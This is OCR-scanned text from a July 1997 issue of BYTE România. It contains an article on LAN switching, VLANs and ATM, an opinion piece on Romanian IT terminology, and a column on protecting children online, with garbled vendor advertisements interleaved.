caţii testează limitele interconectării reţe-
lelor, dirijând cerințele desktop către O rată
de transfer din ce în ce mai mare. Însă arhi-
tecturile actuale nu sunt proiectate pentru
un asemenea nivel de performanță sau cali-
tate a serviciului.
Segmentarea LAN reprezintă o metodă
populară pentru ridicarea performanţei la
nivelul unei interconectări de rețele. Divi-
„zând o reţea LAN suprasaturată în mai mul-
te segmente mai mici, se oferă fiecărei staţii
de capăt o porţiune mai largă de lăţime de
bandă, evitând congestia rețelei. Dusă la
extreme, fiecare staţie ar putea deveni pro-
priul său segment, cu o lățime de bandă
LAN completă.
Deşi iniţial eficientă, segmentarea poate
deveni mult prea complexă şi costisitor de
întreținut. Pentru că fiecare segment LAN
reprezintă o subreţea separată, ea necesită o
adresă unică şi un port ruter dedicat. Pe mă-
sură ce numărul segmentelor creşte, fiecare
mişcare, adăugare sau schimbare declan-
şează o avalanșă de reconfigurări consuma- .
toare de timp. Mai mult, porturile ruterelor
sunt proiectate și evaluate pentru un număr
mare de staţii de lucru, o segmentare con-
tinuă ridicând aceste costuri la nivele neac-
ceptabile.
În mod evident, pentru a suporta creş-
Coloană
Campus
și WAN
Coloane comprimate.
Fundamente ale comutării | Reţele
terea interconectării rețelelor și apariția noi-
lor aplicaţii sunt necesare noi blocuri con-
structive şi noi arhitecturi. Diferenţa pri-
mară între interconectarea tradiţională şi
cea nouă o reprezintă larga răspândire a blo-
curilor de comutatoare. Comutarea este
cheia, atât pentru evoluţia scalară a perfor-
manţei, cât și pentru calitatea serviciului.
Noi arhitecturi și blocuri
constructive
Limitările actuale pe care le întâmpină inter-
conectarea rețelelor a inspirat dezvoltarea
mai multor tehnologii noi. Două în particu-
lar - 100BASE-T şi comutarea LAN -au pro-
dus schimbări dramatice conlucrării în
rețea.
LAN-uri de mare viteză
O modalitate de-a îmbunătăţii performanța
conlucrării în reţea este de-a instala LAN-uri
mai rapide. Așa cum a fost menţionat ante-
rior, 100Mbps FDDI este deja folosit in
multe clădiri şi rețele de campus. Însă
deoarece FDDI este prea scump pentru co-
nectivitatea desktop de bază, 100BASE-T
Fast Ethernet a fost recent lansat pentru a
umple golul existent.
Fast Ethernet este o extensie a standardu-
lui 1OBASE-T Ethernet, doar ca este de 10
ori mai rapid. Atat 10BASE-T cat si
100BASE-T folosesc aceeasi metoda de
acces CSMA/CD, permitand datelor sa fie
transferate între cele două fără o translatare
i:
Interconectarea reţelelor de mare suprafaţă.
a protocolului.
Fast Ethernet este folosit în mod tipic ca
şi o conexiune de mare viteză către serverele
puternic folosite şi utilizatorii puternici,
Coloană
Campus
și WAN
Coloane comprimate virtuale bazate pe cadre.
precum şi pentru conexiuni în jos către rute-
re şi comutatoare. Compatibilitatea cu tra-
ditionalul Ethernet fi permite lui 100-
BASE-T să fie integrat în reţelele existente
10BASE-T, depășind gâtuirile specifice și
configurând scena pentru o eventuală răs-
pândire mai largă.
Standardul 100BASE-T include trei spe-
cificații de mediu: 100BASE-T'X, 100BASE-
T4 şi 100BASE-FX. Specificația 100BASE-
TX acoperă transmisiile de 100 Mbps pe
cablu UTP categoria 5 sau categoria 1 STP,
in timp ce 1OOBASE-T4 suporta aceeasi rata
a datelor pe cablare cat. 3, 4 sau 5 UTP. Spe-
cificatia 100BASE-FX defineste Fast Ether-
net pe cablarea cu fibră optică multimode.
Comutarea LAN
Comutarea LAN, la fel ca şi legăturile prin
punți, subdivide reţelele largi în segmente
mai mici, obținând o îmbunătăţire a per-
formanţei LAN la un preţ coborât, în timp
ce este menţinută investiţia în hard, soft şi
cablare. Folosită în conjuncţie cu soluţiile
de medii partajate de înaltă performanţă,
comutarea LAN furnizează suportul nece-
sar pentru conlucrarea în reţea la nivel intre-
prindere.
Comutatoarele LAN oferă o îmbu-
nătățire a performanţei segmentării LAN
fără să necesite rutere scumpe sau cartele
de interfață cu rețeaua (NIC). Și pentru că
rata de transfer a comutatoarelor creşte pe
IULIE 1997 BYTE România 115
Reţele
.
Fundamente ale comutării
Reţea LAN virtuală pe o coloană comprimată virtuală
bazată pe cadre.
măsură ce sunt adăugate mai multe porturi,
comutatoarele LAN oferă o soluţie scala-
bilă pentru mediile cu o cerere mare.
Comutatoarele LAN sunt similare pun-
ților în sensul că ele folosesc adrese MAC
memorate pentru a transmite cadre de intra-
re la o destinaţie corespunzătoare. Dar față
de punţile convenţionale, care transferă pa-
chete folosind memoria partajată sau un bus
intern, comutatoarele de cadre sunt dese-
ori construite în jurul unei reţele de comu-
tatoare de înaltă viteză, care utilizează cir-
cuite integrate specifice aplicaţiilor (ASIC)
pentru a furniza o rată de transfer mare, la-
tență mică și cost per port redus.
Combinarea hub-urilor pentru medii
partajate cu un comutator LAN nu numai
că divide rețeaua în segmente multiple, însă
oferă fiecărui segment o lăţime de bandă
completă. Cu segmentarea bazată pe rutere,
rata de transfer totală este multiplicată de
un număr de ori egal cu numărul porturilor
comutatorului. Interfețele LAN tradiționale
sunt folosite la fiecare port al comutatoru-
lui, protejând investiţia utilizatorului şi asi-
gurând ca aplicaţiile existente şi sistemele
de operare de reţea să rămână nemodificate.
Rețele virtuale
Deşi comutarea poate îmbunătăţi conlu-
crarea în rețea, ea poate agrava problemele
vechi. Fără o structură de rutare, o inter-
conectare comutată între rețele se comportă
116 BYTE Romania IULIE 1997
ca o retea LAN cu punti, accelerand con-
gestionarea. Solutia traditionala - fiecare
segment comutat sa reprezinte o subretea
separată - ar crea un coșmar al întreținerii
şi al administrării. Rețelele virtuale, o carac-
teristică inerentă în majoritatea produselor
de comutație, oferă o soluție mult mai clară,
decuplând structura logică a rețelei de for-
ma sa fizică pentru a permite o aliniere mult
mai eficientă a traficului de rețea cu mode-
lele de lucru ale utilizatorului. Rețelele vir-
tuale rețin beneficiile performanţei seg-
mentării LAN, în timp ce aranjamentul lo-
gic controlează traficul broadcast şi creează
comunităţi de interes sigure. Modelul trafi-
cului reflectă fluxul muncii mai degrabă
decât topologia de rețea, în timp ce adminis-
trarea reţelei este cu mult simplificată.
Cu reţelele virtuale, interconectarea de-
vine „tentantă“. Numărul subrețelelor scade
deoarece adresele subrețea sunt asignate
catre LAN-uri virtuale (VLAN) si nu seg-
mentelor fizice. Administrarea adreselor
este simplificată deoarece există mai puţine
subreţele şi deoarece stațiile de capăt se pot
muta în diferite segmente ale aceleiași
VLAN, fără a fi nevoie de o reconfigurare
de adresă.
Comutarea configurației este o formă a
modului virtual de lucru în rețea. Utilizatorii
de pe fiecare etaj accesează serverul din cen-
trul reţelei prin hub-ul de comutare a con-
figuraţiei, ocolind ruterul. Administrarea
reţelei este simplificată astfel printr-o cen-
tralizare a serverului, a hub-ului și a ruteru-
lui backbone.
ATM
În timp ce comutarea LAN poate îmbunătăţi
performanţa reţelei şi elibera congestia
coloanei, ea este limitată ultimativ de viteza
LAN-urilor atașate. Pentru conexiuni peste
100 Mbps sau pentru calitate multimedia a
serviciului, a fost dezvoltat un tip diferit de
comutare: modul de transfer asincron
(ATM).
ATM oferă posibilităţi unice pentru re-
ţele largi: EI furnizează performanţe giga-
bit-per-secundă; transportă uşor voce, vi-
deo şi trafic de date; şi garantează calitatea
serviciilor pentru toate formele de trafic.
ATM utilizează celule de lungime fixă pen-
„tru a păstra latența comutării la o valoare
minimă și circuite virtuale prealocate pen-
tru a face procesarea celulelor simplă şi de-
terministă furnizând performanţe înalt sca-
labile. Determinismul si latenta mica per-
mit comutatoarelor ATM să necesite strin-
gente calităţi ale serviciului pentru aplicații
multimedia.
Deși unele organizaţii vor adopta ATM
pentru grupuri de lucru cu lățimi de bandă
excepționale sau cerinte QoS, costul și com-
-plexitatea vor restrânge inițial comuta-
toarele ATM la coloane pentru rețele mari.
Cererile pentru lățimi de bandă backbone
vor creşte pe măsură ce comutatoarele LAN
vor începe să elimine gâtuirile interconec-
tării reţelelor, iar ATM-ul va întâlni aceste
cerinţe și scale pe măsură ce traficul va con-
tinua să crească.
Combinația dintre comutarea LAN şi
ATM în interconectarea rețelelor de înaltă
performanţă a dat viaţă unui nou bloc con-
structiv: comutatorul LAN-ATM. Ca și co-
mutator LAN, el realizează interfațarea di-
rectă cu reţelele LAN tradiţionale si este
transparent pentru aplicaţiile existente şi
sistemele de operare. Iar ca şi un comutator
ATM, el transmite trafic de-a lungul co-
loanei sub formă de celule. Pentru a face
aceasta, un comutator LAN-ATM trebuie
să translateze cadrele LAN în celule ATM
ŞI invers.
O specificaţie a Forumului ATM, numită
emulare LAN (LAN emulation), asigură
interoperabilitatea între utilizatorii LAN şi
ATM. LANE oferă o conectare transparen-
tă prin punți a LAN-urilor tradiţionale
printr-o coloană ATM şi permite staţiilor
de lucru LAN să comunice cu dispozitive
ATM, protejând investiţiile şi asigurând
interoperabilitatea în rețelele cu mai mulți
producători.
Fundamente ale comutării
Arhitecturi de interco-
nectare prin comutatoare
Noile arhitecturi de interconectare care
folosesc avantajul blocurilor constructive
bazate pe comutatoare au început să apară.
În particular - coloana comprimată virtu-
ală bazată pe cadre - este proiectată să evite
gâtuirile de reţea în timp ce este realizată şi
o protejare a investiţiilor existente.
Coloane comprimate vir-
tuale bazate pe cadre
Coloanele comprimate furnizează un suport
mai bun pentru aplicaţiile client/server față
de modelul distribuit, însă sunt clientele
limitării mediului partajat. Coloana virtu-
ală comprimată elimină aceste limitări
mărind mediul partajat cu ajutorul comu-
tatoarelor şi înlocuind ierarhia adreselor
fizice cu reţele virtuale.
Într-o coloană comprimată virtuală baza-
tă pe cadre, comutatoarele LAN de nivel
workgroup înlocuiesc (sau asistă) hub-urile
de medii partajate pentru a evita strangulările
reţelei la nivel desktop. Conectarea la comu-
tatoarele LAN se face prin interfeţe tradi-
ţionale menţinând baza instalată de NIC-uri
şi soft de rețea. Un comutator LAN de nivel
backbone interconectează comutatoarele
grupului de lucru furnizând un punct de
conectare central pentru serverele partajate.
Clienţii şi serverele sunt asignate la
VLAN-uri diferite pe baza modelelor de uti-
lizare şi nu pe baza locației fizice. Traficul
din interiorul oricărei rețele VLAN este
comutat, eliminând latenta ruterului chiar
şi atunci când clienții şi serverele se află pe
segmente fizice diferite.
Un ruter ataşat la comutatorul coloanei
LAN coordonează traficul dintre VLAN-uri.
Din moment ce doar o interfață ruter este
necesară pentru o reţea LAN virtuală, ruterul
centralizat reduce costul general.
Coloanele comprimate virtuale bazate
pe cadre oferă o cale practică de migrare de
la coloanele comprimate fizice, oferind uti-
lizatorilor şansa de-a realiza beneficiile in-
terconectării comutate, fără a fi necesară o
convertire la ATM.
In loc de concluzie
Dacă acest articol a reuşit să vă clarifice une-
le din problemele actuale ale interconec-
tărilor dintre reţele și să vă pregătească pen-
tru schimbările ulterioare, înseamnă că şi-
a atins scopul propus. Pentru o abordare
mai detaliată a problemelor legate de arhi-
tecturile prezentate, puteţi obține informaţii
de pe Internet la adresa http://www.baynet-
Comutator LAN
Vediu partajat
Comutarea
configurației
works.com.
Daniel Moldovan este redactor BYTE România.
Poate fi contactat la: dmoldovanQagora.ro.
ay est
Power
UPS
280 VA - 220K VA
monofazate şi trifazate
Bae Allied Telesyn
Ba fArernchonal
Echipament de reţea: Huburi, Switchuri, Transceivere
za
@
=
—
cS
ln:
ICL
FUJITSU
PCs - NOTEBOOKS - SERVERS
Multiplexoare
Seriale.Routere
NATIONAL
INSTRUMENTS*
The Software is the Instrument ®
Achizitie de date
Control de proces
Program de AUTORIZARE
Sunati acum pentru detalii !
ODBC. JDBC. SequeLink. PVCS
RESELLERI zonali
OnNet32
Interdrive
Secure Client
Internet Gateway
Open Server
Unixware
Vision Family
INTERSOLV
www.agora.ro/byte/
JULIE 1997 BYTE Romania 11/7
Ub Roboties
MORE POWER 5
dpe Gon NOL Oo. GY
Numai
cu tehnologia x2 adauga | TOTA Lco nt ae) i
mai multă putere echipamentelor
de comunicaţii care reușesc să Modem Pool
transmis do douse on mai ~ «de 8 module sau 16 module
multe date decat echipamentele
V.34 standard. a — ™
au * de 8 module sau 16 module
suportă 56K, ISDN, V.34
și management într-o singură
platformă
oferă soluții la 56K pentru ENOAp Lco ntrol
organizații de toate mărimile Peene eines ae Enterprise Network Hub
„E E E Ta TE O CIEL
vă oferă astăzi produse fie ce ORE eee /. = * module Quad Modems
de cea mai buna calitate Se tee Me ts * module Dual Modems
care nu vor necesita maine E m gue * module Dual PRI, Dual 11
upgrade hardware pentru A ae eae > module NETServer PRI
a lucra la 56K pi PP *» module NETServer
* module Integral X.25 PAD
va furnizeaza echipament pentru
a construi Intraneturi mai mari,
mai rapide, mai fiabile is VI O DE AVA U mt |
a revoluționat accesul la distanţa că A Aaa
prin introducerea echipamentelor a i dili ee sau digital
TOTALControl e |
* Sportster ISDN TA
: ee eee * Sportster Winmodem
cu tehnologia x2 va ajuta sa — = * Sportster Voice, Sportster Flash
reduceti costurile RomTelecom i * ADSL Terminal Unit - Remote
m1 Exemplu: ţineţi minte când se punea
problema blue jeans ? Lingyviştii n-au inter-
venit cat se mai putea face ceva. Apoi maha-
lauaaimpus blugi. Nimanui nu-i place, dar
„societatea“ a hotărât ! Mă rog, asta a fost
wwmw.agora.ro/byte/
o paranteză (mizez pe faptul că lingviştii
nu prea citesc reviste de informatică; sunt
laș, n-aş vrea să ştie că-i critic în public, sunt
prietenii mel).
Să (re)vin la plebicist. Sunt de acord cu
„principiile lui Sârbu“. Le-aş mai comen-
ta însă. .
Sârbu 1: a se evita crearea inutilă de
neologisme. Prin asta dânsul înţelege
crearea de „neaoşisme“ gen „gâtlegău“. Da
(în principiu). Corolarul meu: a nu se evi-
ta crearea utilă de neologisme.
Sârbu 2: a se evita preţiozitățile. Adică,
dacă poporul a românizat, noi „telectualii“
să nu ne dăm culţi (putem să ne remarcăm
în alte ocazii).
Sârbu 3: a se permite crearea de cuvinte
noi prin mecanismele naturale ale limbii.
Jawohl!
Sarbu 5. a nu se contrazice obisnuinte
deja create. Practica zice că se poate, dar
nu merită. Francezii au reușit cu logiciel,
dar n-au reuşit cu bouteur (= buldozer).
Sârbu 6. a se evita posibile confuzii. Cu
alte cuvinte, dacă se poate reduce ambi-
guitatea, să se !
Subscriu. Problema e cum să facem ca
să le respectăm pe toate ? Răspunsul meu:
să procedăm „postmodern“, adică cum ne
vine bine !. Adică (în această ordine de pri-
oritati):
a) Reutilizând ce avem deja, când se potri-
veşte. Exemple:
1. user-friendly = convivial.
2. window = fereastră.
3. keyboard = tastatură.
b) Inventând (când avem cu ce, şi iese intui-
tiv). Exemple:
1. E-mail = e-poştă (pronunția email e
clar catastrofală).
2. Download = descopia (e natural și e
De Dan Matei
precis, se diferențiază convenabil de a
descărca).
3. Upload = încopia (vezi mai sus, mo-
dele ar fi: încleia/descleia, spre pildă).
c) Transpunand din frantuzeste (cand ne
vine bine). Exemple:
1. Mainframe = macrocompiuter (con-
trast convenabil cu microcompiuter).
2. Downsize = micromizare (foarte
intuitiv).
3. Spreadsheet = tabelor (nu tabulator!).
d) Fonetizând (e în spiritul limbii române
!)) termenul englezesc care se foloseşte
curent (dacă merge !). Exemple (cu care
ştiu că mă expun ridiculizării; o să supra-
viețuiesc):
1. Compiuter/compiutere (Cei ce râd
trebuie însă să-mi răspundă: compu-
ter/computere de ce să aibă rădăcina engle-
zească $i desinenţele românești [cum se
articulează ? cum se declină ?] ? După care
logică ? Dar bit/biţi sau bait/baiţi de ce am
acceptat ?).
2. Maus/mausuri (E foarte pragmatic:
desemnează un obiect bine precizat, e mult
mai precis decât șoarece. Cu alte cuvinte,
astfel se de-metaforizează și mai scade
ambiguitatea limbii).
3. Icon/iconuri (E. mult mai precis şi mai
adecvat decât icoană; măcar nu-l deterio-
rează. Mai ales că aveam deja adjectivul
iconic.).
4. Clic/clicuri, a clicăi (a clica) (Sorry,
aşa se zice prin jurul meu ! S-a întâmplat
în mod natural, ca și a ticăi, presupun. ).
5. Hard/barduri (Asta e !).
6. Soft/softuri (Vezi $).
7. A loga (Unixiştilor, spuneţi altfel ?).
8. Draiver/draivere (Ce hibă are ? De ce
zicem coafor şi nu coifeur ?).
9. Form/formuri (E neambiguu, i.e. mai
precis decât formă/forme sau formular! for-
IULIE 1997 BYTE România 125
P
Opinii
Terminologia noastră
*
EGHIPAMENTE
ey ces nr. 33
926 79 tel/fax: 230 44
“TEHNIG, BONSUMABILE. SOFTWAFE:
“str. Județului nr. 9, bl. 20, sc. A, ap.2
tel/fax: 210 52 64
BUCUREȘTI
mulare).
10. Onlain (E evident cd nu avem o solutie
românească preexistentă. De ce să n-o adop-
tăm, e în spiritul limbii.).
11. Freim/freimuri (Zice cineva cadru/ca-
dre ? N-am auzit.).
12. Aplet/apleturi (Ce poate fi mai natu-
ral ?).
e) In fine, lăsând termenul ca la mama lui,
a Sea i
Semnal I:Seiceip. 9 (Aillotalro
când nu iese altfel. Exemple: OK, PC,
SCSI, CD-ROM, cut/paste.
În definitiv, nu astea sunt procedeele cla-
sice prin care se îmbogățește limba ? Da' în
sec. XIX cum s-a făcut ? Unde s-ar ajunge
dacă toate cuvintele le-am păstra în forma
originară ? Şi atunci, aş adăuga la principii-
le Sârbu vorba cântecului „să nu uităm nici-
când să iubim fonetismul“. Eu îl iubesc. Cred
că e un atu al limbii române (ştiu, nimic nu e
perfect: este-zis-ieste, server-zis-servăr etc.
Şi totuși). Asta mi-a devenit evident când —
în '84 — am fost în China (ce vremuri...
România vindea Felixuri în China...) și am
venit în contact direct cu ideogramele.
Cum să nu fiu impresionat când aflu că ceai
Şi tea sunt ambele cuvinte chinezeşti (unul
din nord, celălalt din sud), dar că au aceeași
„reprezentare grafică“ ? Sau când văd la piață
oameni care, în ultimă instanță — ca să se
NO zii
Authorized
Reseller
înțeleagă — desenează ideograma cu dege-
tul pe palmă ? Şi o dată m-am gândit (ok,
după aia m-am odihnit !): ce se întâmplă dacă
unul al dracului îi strecoară lui Ceaușescu
în mijlocul discursului un cuvânt „tare“,
„maniheism“, să zicem ? Nimic, citește şi-i
dă mai departe. Dar, într-o situaţie simi-
lara, bietul Deng ce face ?
Sustin si principiul Sarbu 4: a se incuraja
crearea de sinonime. Dar acesta e de natură
stilistică. Important, dar nu esenţial.
În concluzie, mă declar un autohtonist
eclectic. Aș formula ca un corolar la prin--
cipiile lui Mircea: dacă e de ales, să se aleagă
varianta care îmbogățește limba, nu-i aten-
tează la fonetism şi sporeşte precizia expri-
mării. Îmi vreau limba bogată, precisă,
nuanțată, deschisă. Pentru mine diversitatea
culturală (în particular lingvistică) este o
valoare importantă. Foarte importantă. Prin
urmare, Byte-tilor, PC-Report-tilor, tineti-o
tot asa, tovardsi ! Ml
20 iunie 1997, 13:06
Domnul Dan Matei este vicepresedintele
RomTerm (Asociatia Romana de Termi-
nologie).
PCMCIA
Solutii pentru culegere de semnal
Ultimele noutati din familia de produse PCMCIA de la National Instruments includ:
DAQCard-Al-16E-4 — 16 canale analogice, 250 kS/s viteza de scanare, rezolutie de 12-bit,
8 linii digitale, 2 counter/timer de 20 MHz up/dpwn.
DAQCard-Al-16XE-50 — 12-canale analogice, 200 kS/s viteza de sampling, pe un canal,
20 kS/s viteza.de scanare, rezolutie de 16-bit, 8 linii digitale, 2 counter/timer de
20 MHz up/down.
DAQcard-516 — cea mai ieftina cartela de 16-bit de pe piata! 8 canale analogice,
50 kS/s viteza de scanare, rezolutie de 16-bit, 8 linii digitale, 2 counter/timer de 10 MHz.
Software — NI-DAQ Driver sofware pentru Windows 95, si Windows 3.1. Acest driver poate
fi folosit din LabVIEW, LabWindows/CVI, ComponentWorks, Measure, VirtualBench,
Visual Basic, si C/C++.
7 NATIONAL
INSTRUMENTS
The Software is the Instrument Da telefon integratorilor
Integratori de sisteme National Instruments in Romania nostrii de sisteme pentru
Bucuresti: Imperial Electric 211 3782; Genesys Software 638 4944; informatie asupra produselor
ACT 637 7156 a PCMCIA,
Cluj-Napoca: FROsys 064/43.08.05; Net Brinel Computers 064/43.02.80
Timisoara:
lasi:
CoRES Trade 056/19.00.51
Tehnorom 032/11.65.02; Prince Software 032/21.25.59
si conditionare de semnal.
© Copyright 1997 National Instruments Corporation. All rights reserved.
Product and company names listed are trademarks or trade names of their respective companies.
Evanghelia după Internet (II)
Mărturii din ciberspațiu
De Dan lancu
Cresteti si va inmultiti !
os concept “ open n is based on the recognition that ay act on ie basis N imperfect bnowledue
and nobody is in possession of the ultimate truth.“
i acum se va ridica veşnica în-
trebare a căutătorilor de soluţii
facile: „Bine, bine, am înţeles
cum e cu responsabilitatea alege-
rii, dat cum rămâne cu copiii?“. Un fel de
dreptate ar avea la prima vedere, dacă stăm
şi ne gândim câte fantome bântuie Interne-
tul, de la sectele ce propovăduiesc o nouă și
„definitivă“ religie, până la banala de acum
pornografie. Dacă fiece adult are dreptul
de a îngurgita plăcinte cu barbiturice asezo-
nate cu vodcă, nu putem sta indiferenți când
ne gândim că aceasta i se poate întâmpla
unuia de lângă noi, chiar de foarte aproape.
Cum să fie apărați cei ce n-o pot face singuri,
cei care încă nu au discernământul format
pentru a decela ce se ascunde sub o tentantă
propunere dotată mai ales cu poze frumos
colorate şi explicații aparent pe înțelesul
tuturor?
Acum ceva timp am citit în Boston Globe
istoria unei fete de 13 ani care și-a pus șap-
ca-n cap (expresie tradusă cuvânt cu cuvânt
după titlul articolului) și a plecat în lume după
e-iubitul ei. Şi uite aşa a hălăduit ea prin Ame-
rica vreo trei săptămâni spre disperarea pă-
rinţilor care se topeau de dorul ei. Ziarul rela-
ta de fapt un happy-end în care fătuca dădea
un interviu moralizator îndemnând pe alte
surate predispuse la e-dragoste să fie cumpă-
tate, în timp ce acaparatorul de minore zăcea
în arestul politiei (cât se poate de ne-electro-
nică!) pentru a da lămuriri asupra tentativei
de e-corupere. Acesta e un caz fericit.
Problemele apar când sunt preluate cu
titlu de „am găsit vinovatul“ declaraţiile unor
delicvenți minori cum că au acționat pen-
tru că așa au văzut undeva pe Internet sau
într-un film sau într-o carte. În fond nu e
mare diferență între a considera „The Catch-
er în the Rye“ responsabilă de asasinarea lui
John Lennon şi condamnarea libertăţii de
a-ţi crea o pagina de Web în care să prezinți
o apropiată venire a sfârşitului lumii şi să
îndemni la sinucidere colectivă. Lupta clasi-
ficărilor obiectelor audio-vizualului după
criterii altele decât estetice este poate o armă,
după cum voi repeta și mai jos, cu două
tăișuri. Unul tocit, cel al râvnitei filtrări,
celalalt extrem de ascuţit, cel al vânzărilor.
Dar să trecem la soluţii, mai bine zis la
enumerarea lor pentru că, cinstit să fiu, nu
văd cum am putea împiedica pe cineva, fie
el un copil, de a se aventura pe ici pe colo,
mai ales unde nu are voie. Nu pentru că
plozii noştri nu ar fi cuminţi, nuuu, dar par-
că poți să ştii?
Cea mai banală soluţie este filtrul. Unde
punem filtrul? „Dacă e prea înalt în sus... “.
Ar fi câteva locuri: în propriul calculator,
în server sau in țară. Primul loc e cam nesi-
gur. Un plod bine antrenat va găsi mijlocul
să-l demonteze şi să ni-l monteze nouă even-
tual. Oricum, vom fi — tehnic vorbind — în
urma copiilor, mai ales că lumea calcula-
toarelor e plină de newbies vârstnici și, în
ziua de azi, un tisti-bisti îţi poate ține lecţii
de cum se poate decodifica o biată parolă a
Pentagonului. Filtrarea făcuta la nivel de
server sau furnizor de acces nu e nici ea o
soluţie infailibilă, pentru că se poate găsi o
cale de a ocoli (să v-o spun?) şi acestimpedi-
ment. Rămâne doar legea. Dura lex, sed lex,
vom exclama fericiți frecându-ne pe mâini.
Hmm! Cum rămâne cu libertăţile, ca să nu
mai vorbim că am pasat cartoful fierbinte
împreună cu responsabilitatea pe umerii
unui golem iluzoriu: statul? Vom cere să se
pună avertismente, parole, chestionare de
vârstă, dar cel care caută găsește și celui care
bate insistent i se va deschide fără doar și
poate. Nu, nu asta poate fi o soluţie reala,
mai ales că ziarele abundă de informaţie
fierbinte despre astfel de „evenimente“
(de exemplu, în articolele despre Heaven's
Gate nici o revistă serioasă americană nu
uită să adauge și adresa http, unele alcătuind
și o listă exhaustivă de astfel de locuri, nu
de alta, dar dacă a scăpat cineva ocazia?).
Şi ce să mai crezi dacă peste tot, nu numai
în România, se face o reclamă nebună
„geniilor“ fragede care mai sparg pe ici pe
George Soros,
swww.Soros.ro
colo câte un cod secret. Că un ziarist nu pri-
cepe de ce respectivul nu e genial, n-ar fi de
mirare, dar prețuirea acordată desigur va
înfierbânta mințile a nu ştiu câți ca el. Şi cum
poţi opri această super-afacere a mass-me-
diei, titlurile care se vând bine, care-ţi batla
ușă, care te trezesc, care-ţi năvălesc în casă
oricât te-ai ascunde?
Poate şcoala? Dificil de crezut că astăzi,
în România, mentalitatea profesorilor de
liceu sau şcoală generală e cu totul alta decât
cea din vremurile anterioare (şi nu mă refer
doar la Epoca de Aur). Nu vreau să fiu luat
drept Cassandra, dar nu cred că dintr-o
dată rigiditatea impusă de o educaţie orto-
doxă, comunistă sau, mai nou, exagerat reli-
gioasă, va da soluţii elastice şi va putea găsi
resursele necesare pentru o real democrati-
că educație. Avem, în general, probleme de
înțelegere a drepturilor umane elementare,
printre care la loc de cinste e dreptul la libe-
ra exprimare, că de el vorbim, așa că o vizi-
une deschisă asupra a ceea ce-i „nociv“ pe
Internet şi cum să lămurim copiii să evite ast-
fel de contacte este departe de a fi aproape
de adevăr. Nu de mult, un tânăr profesor,
asta da surpriză, făcea pe o listă de discuţii cu
profil literar apologia comunismului. Acel
„educator“ se retrăgea apoi în „aplauzele“
mulțimii de pe lista respectivă, dar nu singur,
ci împreună cu o elevă a lui (n-o să ştiu
niciodată dacă respectiva se înscrisese per-
sonal sau doar el făcuse oficiul şi totel primea
poşta — bănuitor fiind optez pentru a doua
variantă). Rămânea în urmă-i doar oribili-
tatea faptului de a bloca unui copil accesul
la un loc care i-ar fi putut folosi. Dar, desi-
gur, acesta e punctul meu de vedere și nu al
lui. Poate este un exemplu extrem, ați spune,
dar mă îndoiesc. Aș înclina să cred că e tipic
şcolii româneşti, nu de alta, dar semnele
găsite prin paginile de Web ale liceelor
româneşti seamănă destul de bine cu revis-
tele şcolare din vremea mea. Publicăm ele-
vii, dar e-decidem noi, profesorii. Mă întreb
cand vor indruma...
JULIE 1997 BYTE Romania 127
Comentariu
Cresteti $i va inmultiti
Şi iată că, vrând-nevrând, mingea tot în o-
grada noastră a ajuns. Dar, Dumnezeule, când
săne ocupam de copil? Eu ştiu? În Newsweek
(May 12, 1997, ediţia pentru SUA) se preci-
zacatatal are 19% timp pentru copiliar mama
32%. Poate ar trebui doar să ne adaptam fi-
lozofia „Ocupatului de copil“ acestei ere noi
şi nu să găsim mai mult timp. Ce- -ar fi să stăm
de vorbă cu el? Dar nu așa, cu „În copilăria
mea... “,cănu ajută. Vi se va râde-n nas maxi-
mum în gând, din frică sau din politețe — dar
efectul va fi nul. În PC Magazine (nr. 10, din
27 nai) Michael ]. Miller scria să urmărim
log-urile calculatorului ca să vedem pe unde
umblă Măria Sa Copilul. Nu proiectând fuga
noastră de răspundere asupra dezvoltării unei
ființe umane vom rezolva ceva, soluția lacăt-
filtru neavând viitor decât pentru cei care
visează posmagi muiaţi. Să-l lăsăm să caute
fără să-i impunem prin corecţii adresele per-
mise și să-l veghem. Victoria va fi când el însuşi
ne va spune peste ce-a dat şi de ce nu l-a ten-
tat. A îndruma este arta care presupune pe de
o parte răspunderea ta și pe de alta crearea ei
la cel îndrumat. Să aducem diverse subiecte în
discuţie. De exemplu, ce-ar fi să renunțăm la
povestea cu barza şi să îndrăznim să trecem
peste tabu-urile de care noi înşine am fost
îmbibaţi. Industria pornografică își măreşte
dividendele înscriind cu naturalete pe pagi-
na de acces aparent seriosul îndemn de a împli-
ni 18 ani. Capcana e evidentă. Pe cine nu îl
mână curiozitatea să afle ce este în spatele
uşilor închise? Neştiinţa amplificată de
neînțelegere, iată cheia „succesului“ și rezulta-
tele nu se vor lăsa așteptate! Sau să renunțăm
la fumat și la binecunoscuta formula de
superioritate „fă ce spune popa, nu ce face el“.
Când vom cunoaşte unde am greşit și vom
putea împărtăși și altora, chiar copiilor noştri,
cuma fost, fără să ne ascundem după degetele.
subțiri ale lui „dar nu am avut ce să facem“,
atunci vom fi mai aproape unul de celălalt,
pentru că „errare humanum est, persevera-
“.Sausărenunțăm să venim „bine dispuşi“
acasă și mai ales să nu ne mai certăm. Sau să...
Ehe, ce lume frumoasa ar fi.
În fond şi la urma urmei, Internetul poate
fi o stâncă Tarpeiană și cel care va rezista va
fi un bun spartan. Impactul este mult mai
agresiv decât celelalte forme de informare.
Preconizata şi anunţat realizata push-tech-
nology va mări doza de agresivitate a reţelei
ŞI „scapă cine poate“. N-aş recomanda nici
unui părinte un astfel de tratament, dar ar fi
bine să ştie fiecare că nu lacătul va opri ceva
vreodată, ci numai cuvântul deschis şi făcă-
tor de minuni. Să fim alături de cel care nu
ştie, să-l învăţăm, dar nu vârându-i pe gât o
morala de plastic roz, ci discutând ce si cum,
descoperind pentru el cât şi pentru noi,
răspunzând la întrebări şi nu ascunzându-ne
de noi înșine cu magica formulă „asta nu e
pentru vârsta ta“. Și să nu ne fie rușine să
spunem ca nu ştim dar vom căuta, și să căutăm
într-adevăr, căci poate așa ne vom răspunde
şi nouă la întrebări care le-am fi pus dacă...
Sau sănu cumpărăm calculator! Dar asta e
tot o decizie. N-am ce sa vă fac, cartoful e tot
fierbinte şi tot la dumneavoastră-n palma.
Boston, 11-mai-1997
Dan Iancu (uhi4geQaol.com)
MICĂ
PUBLICITATE
i¢ = = ș [i
Intormam pe cei intresali că revi
voastră clectronica, Agora On Ling
WWW, E-MAIL, FTP..
Aue iti
aed
ay
0
-
“[N-]]1j3841 HSesojo}
“dH 'uoue) 'uosda
oueruiudiuu! ej
: tel/fax: Cee ae 7
| EzAl az E
riciale
DFX-5000+ „81
DFX-8000 22.223.538
t de cerneală
Nu știm.
costă
lumea?
Ce vă putem însă
spune este că
un anunț de
mică publicitate
de această
